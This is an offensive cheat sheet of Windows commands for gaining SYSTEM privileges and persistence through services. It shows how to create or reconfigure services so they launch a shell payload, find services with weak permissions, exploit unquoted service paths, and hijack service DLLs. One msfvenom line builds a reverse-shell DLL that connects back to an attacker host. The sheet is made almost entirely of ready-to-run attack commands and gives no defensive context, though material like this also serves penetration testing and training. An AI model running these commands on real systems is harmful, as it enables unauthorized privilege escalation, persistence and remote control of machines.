Service Creation & Persistence
Create a service for SYSTEM shell
sc.exe create — If you have local admin but need SYSTEM
sc.exe create reverse binPath= "C:\Windows\Temp\shell.exe" start= auto
sc.exe start reverse
Modify existing service binary path
Change service to point to your payload
sc.exe config <service> binPath= "C:\Windows\Temp\shell.exe"
sc.exe stop <service>
sc.exe start <service>
Check service permissions
Which services can you modify
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Everyone" *
# SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS = exploitable
Unquoted service paths
If service path has spaces and no quotes — Hijack with binary in parent directory
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"
# Path: C:\Program Files\My App\service.exe
# Place payload at: C:\Program.exe or C:\Program Files\My.exe
DLL hijacking via service
Replace DLL loaded by service — Runs as service account
sc.exe qc <service>
icacls "C:\Program Files\Vulnerable App\"
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o hijack.dll
sc.exe stop <service> && sc.exe start <service>